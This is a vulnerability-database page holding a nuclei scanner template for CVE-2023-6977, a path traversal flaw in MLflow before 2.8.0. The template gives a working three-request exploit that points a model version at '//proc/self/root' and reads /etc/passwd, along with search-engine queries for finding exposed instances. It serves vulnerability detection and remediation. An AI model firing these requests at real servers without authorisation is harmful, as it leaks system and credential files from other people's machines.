Lucene search
K

Mlflow <2.8.0 - Local File Inclusion

🗓️ 30 Jun 2026 04:56:11Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 25 Views

Mlflow <2.8.0 - Local File Inclusion vulnerability, allows LFI, CVSS score 7.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2023-6977
29 Dec 202319:16
circl
CNNVD
Mlflow Security Vulnerabilities
20 Dec 202300:00
cnnvd
CVE
CVE-2023-6977
20 Dec 202305:37
cve
Cvelist
CVE-2023-6977 Path Traversal: '\..\filename'
20 Dec 202305:37
cvelist
GithubExploit
Exploit for Uncontrolled Resource Consumption in Siemens 6Bk1602-0Aa12-0Tp0_Firmware
3 Apr 202018:47
githubexploit
Github Security Blog
MLflow Local File Disclosure Vulnerability
20 Dec 202306:30
github
NVD
CVE-2023-6977
20 Dec 202306:15
nvd
OSV
BIT-MLFLOW-2023-6977 Path Traversal: '\..\filename'
6 Mar 202410:56
osv
OSV
GHSA-QG8P-32GR-GH6X MLflow Local File Disclosure Vulnerability
20 Dec 202306:30
osv
Prion
Design/Logic Flaw
20 Dec 202306:15
prion
Rows per page
id: CVE-2023-6977

info:
  name: Mlflow <2.8.0 - Local File Inclusion
  author: gy741
  severity: high
  description: |
    Mlflow before 2.8.0 is susceptible to local file inclusion due to path traversal in GitHub repository mlflow/mlflow. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
  impact: |
    Successful exploitation could allow an attacker to read sensitive files on the server.
  remediation: |
    Upgrade Mlflow to version 2.9.2 or later to mitigate the vulnerability.
  reference:
    - https://huntr.com/bounties/fe53bf71-3687-4711-90df-c26172880aaf
    - https://nvd.nist.gov/vuln/detail/CVE-2023-6977
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-6977
    cwe-id: CWE-29
    epss-score: 0.03924
    epss-percentile: 0.89039
    cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: lfprojects
    product: mlflow
    shodan-query: http.title:"mlflow"
    fofa-query:
      - title="mlflow"
      - app="mlflow"
    google-query: intitle:"mlflow"
  tags: cve,cve2023,mlflow,oss,lfi,intrusive,lfprojects,vuln

http:
  - raw:
      - |
        POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json; charset=utf-8

        {"name":"{{randstr}}"}

      - |
        POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json; charset=utf-8

        {"name":"{{randstr}}","source":"//proc/self/root"}

      - |
        GET /model-versions/get-artifact?name={{randstr}}&path=etc%2Fpasswd&version=1 HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: word
        part: header_3
        words:
          - "filename=passwd"
          - "application/octet-stream"
        condition: and

      - type: status
        status:
          - 200
# digest: 490a004630440220219d7466c09c5339c78660c128f776849c92be2cb87b78648c1d5e7f2aba4802022059a29b7c44267de1ec66b9c529e8d140b5b56bac11c0728c299aab6e0f4a7389:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.2High risk
Vulners AI Score7.2
CVSS 3.17.5
CVSS 310
EPSS0.03924
25